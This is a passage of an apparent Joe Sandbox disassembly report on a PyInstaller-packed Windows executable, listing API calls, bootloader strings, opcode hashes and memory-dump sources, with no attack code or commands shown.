                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                      • API String ID: 190572456-2007157414
                                                                      • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                      • Instruction ID: dcd2a43fb98ae11f8d371fea8ef00dc3fa6924d50b2b81194dc738634587f8d1
                                                                      • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                      • Instruction Fuzzy Hash: 01129168D2EF03D1FA15FB44A8501B4A7A1AF48792FD4143ACC1E12AA6FF7CF5488670
                                                                      APIs
                                                                        • Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9
                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00007FF76D5C7C97,?,?,FFFFFFFF,00007FF76D5C3834), ref: 00007FF76D5C782C
                                                                        • Part of subcall function 00007FF76D5C26C0: MessageBoxW.USER32 ref: 00007FF76D5C2736
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                      • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                      • API String ID: 1662231829-930877121
                                                                      • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                      • Instruction ID: 9408ae2ab19cebbd0c409b4ff9f69d6af695db70648c0e9d199bf38b6d6a3c21
                                                                      • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                      • Instruction Fuzzy Hash: D9419411E3C643C1FB60BB24D8516BAE261AF98784FC4543ADE4E42E97FE6CE1048B70
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                      • String ID: P%
                                                                      • API String ID: 2147705588-2959514604
                                                                      • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                      • Instruction ID: 1ced1044051193052f11547bade4a54319b432d052b523778522b2f22fd7e498
                                                                      • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                      • Instruction Fuzzy Hash: 7C51E7266187A1C6D734AF26A4181BAF7A1F798B62F404135EFDE43A85EF3CD045CB20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: -$:$f$p$p
                                                                      • API String ID: 3215553584-2013873522
                                                                      • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                      • Instruction ID: 70342ae1048d00d7bbbc4ff14f84e99d768751412113c11966c0c306380374dd
                                                                      • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                      • Instruction Fuzzy Hash: 66127361A2C243C6FB20BB15D064279E661FB52750FD44136DAAA46EC6FF3CE590CB38
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: f$f$p$p$f
                                                                      • API String ID: 3215553584-1325933183
                                                                      • Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                      • Instruction ID: 1b85cf809e91196545d0148d97ab6021bb633926a2feb0ae865539252f420907
                                                                      • Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                      • Instruction Fuzzy Hash: 06128361E2C143C6FB20BA1AE0646B9E251FB80754FD44033DAA947DC6EF7DE4809B79
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                      • API String ID: 2030045667-3659356012
                                                                      • Opcode ID: 816554a1a3990d1aa15a165decd0f48e15bed51eddb0c66ae83cc9cee42fa1b7
                                                                      • Instruction ID: 26a90a7a21aa1f065b8da1727ee743bf6e986799b3433e0c9bd60d09c9e32b59
                                                                      • Opcode Fuzzy Hash: 816554a1a3990d1aa15a165decd0f48e15bed51eddb0c66ae83cc9cee42fa1b7
                                                                      • Instruction Fuzzy Hash: 14415C21B2C642C2EA20BB12E8409B6E2A1BB44BC4F844035DD5D47F97FE3CE4458B70
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                      • API String ID: 2030045667-3659356012
                                                                      • Opcode ID: 06f13d1863edb298e36760d8358ffb7f45ae280eb4821161b66b4be0031298b2
                                                                      • Instruction ID: e1090303b6d967d48e7ca4b378c5d5cbbde2134319f78b6b668c17c49713789e
                                                                      • Opcode Fuzzy Hash: 06f13d1863edb298e36760d8358ffb7f45ae280eb4821161b66b4be0031298b2
                                                                      • Instruction Fuzzy Hash: 0E415C21B2C653C1EA20BB15A8505BAE3A0EB48B94F945036DE4E47E97FE3CE5418B20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                      • Instruction ID: e0d039ff91a23e5512b84333114877244d3d57b5b4fedc486f6a8249595b7d54
                                                                      • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                      • Instruction Fuzzy Hash: BED16032A2C741C6EB20AB6594413ADB7A0FB55798F500139EE4D97F96EF38E091CB60
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD06D
                                                                      • GetLastError.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD07B
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD0A5
                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD113
                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD11F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                      • Instruction ID: 74358a6a3c4ddc56717f919ded47983f850b968a7d66a014d21fbbc1527b9100
                                                                      • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                      • Instruction Fuzzy Hash: BB31E82566EB42C1EE15FB1AA400575A394BF88B65FD9053ADD1D57B42FF3CE0428B30
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                                      • Instruction ID: cd5f792b410c71dcf3c5fdcf970c33abae0a6236f8d723b2d8bc63fc76eabc0f
                                                                      • Opcode Fuzzy Hash: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                                      • Instruction Fuzzy Hash: 5A216D21A2C642C2FA64B325566597AE1425F587B0FD40634EC3E47EDBFE2CB4404738
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                      • Instruction ID: 6c067c9143ad5e9d92f9a18da1a36c34864403abf882b79d6ada97431a994f69
                                                                      • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                      • Instruction Fuzzy Hash: 1E118E21A2CB42C6E750BB02E844329A2A1FB8CBE5F840234EE1D87B96EF3CD504C750
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C821D
                                                                      • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C827A
                                                                        • Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9
                                                                      • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C8305
                                                                      • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C8364
                                                                      • FreeLibrary.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C8375
                                                                      • FreeLibrary.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C838A
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                      • String ID:
                                                                      • API String ID: 3462794448-0
                                                                      • Opcode ID: bfcefcadc4499c1de8e385cb70073816e38e2b1c8d4e625d2f32d7c46dc3e7cf
                                                                      • Instruction ID: 3a52251cca8e3cb8f25608df04fce95e339491af82c9d27b9614f2b945e6b2aa
                                                                      • Opcode Fuzzy Hash: bfcefcadc4499c1de8e385cb70073816e38e2b1c8d4e625d2f32d7c46dc3e7cf
                                                                      • Instruction Fuzzy Hash: 01418462A2D682C1EB30BB11A9002BAB794FF45BC4F845139DF5D57B86EE3CD501CB60
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA5E7
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA61D
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA64A
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA65B
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA66C
                                                                      • SetLastError.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA687
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                                      • Instruction ID: 02b868a37af12cb0df3e4e5ffc436b19244db83960c4533d725fe938b630bb10
                                                                      • Opcode Fuzzy Hash: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                                      • Instruction Fuzzy Hash: 8A115B20E2C642C2FA647725566157AE2425F587A0F844334DC3E47EDBFE2CB4018739
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                      • String ID: Unhandled exception in script
                                                                      • API String ID: 3081866767-2699770090
                                                                      • Opcode ID: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                      • Instruction ID: 609efc2a4745c317c5030dfd28b771cd4af625adbb1b43f507c9b1ac438cc0d9
                                                                      • Opcode Fuzzy Hash: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                      • Instruction Fuzzy Hash: 50313F7262D682C5EB20BB61E8552E9B360FB89784F840135EE4D47F56EF3CD1058724
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message$ByteCharMultiWide
                                                                      • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                      • API String ID: 1878133881-640379615
                                                                      • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                      • Instruction ID: 717f1ca66979865fc5c786b3c2831773d00d59b48c524b8df2ad7bfa9f92ad9f
                                                                      • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                      • Instruction Fuzzy Hash: 3D21217263C786C1E720BB10E4517EAA364FB88784F801136EA8D13A5AEF7CD645CB64
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                      • Instruction ID: 6791fe7d6ae47f2166580b93635099f42453476462a87e24ff5da961499b015b
                                                                      • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                      • Instruction Fuzzy Hash: 77F0AF61A2C742C2EB14BB24A454379A320AF897A2FD80735CD6D4A9E5EF2CD049C720
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
